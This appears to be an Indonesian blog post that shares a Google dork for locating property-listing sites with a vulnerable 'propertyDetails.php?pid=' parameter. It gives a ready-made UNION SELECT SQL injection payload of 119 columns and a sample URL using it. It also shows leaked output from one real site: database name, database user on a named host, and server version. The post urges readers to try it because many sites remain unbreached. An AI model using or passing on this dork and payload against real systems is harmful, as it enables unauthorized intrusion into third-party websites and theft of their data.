kemarin habis begadang eh gak taunya dapat kode injection
coba gunakan dork dibawah ini
inurl:"propertyDetails.php?pid="
jika kita teliti semua website yang di inject pasti kolomnya ada 118 atau tambahin aja url dibelakangnya dengan ini
"+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118"
jadi hasilnya "www.situsnya.com/propertyDetails.php?pid=25+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118"
biasanya celah ada di kolom 8 dan belakang- belakang gak tau berapa(lupa)
dan isinya
Database: propertywebsite2
User: pwo@webhost0.buswebservers.co.uk
Version: 5.0.32-Debian_7etch8-log
selamat mencoba(masih banyak web yang belum kebuka jdi jangan kuatir g ada isinya)
good luck
Langganan:
Posting Komentar (Atom)
0 Comment:
Posting Komentar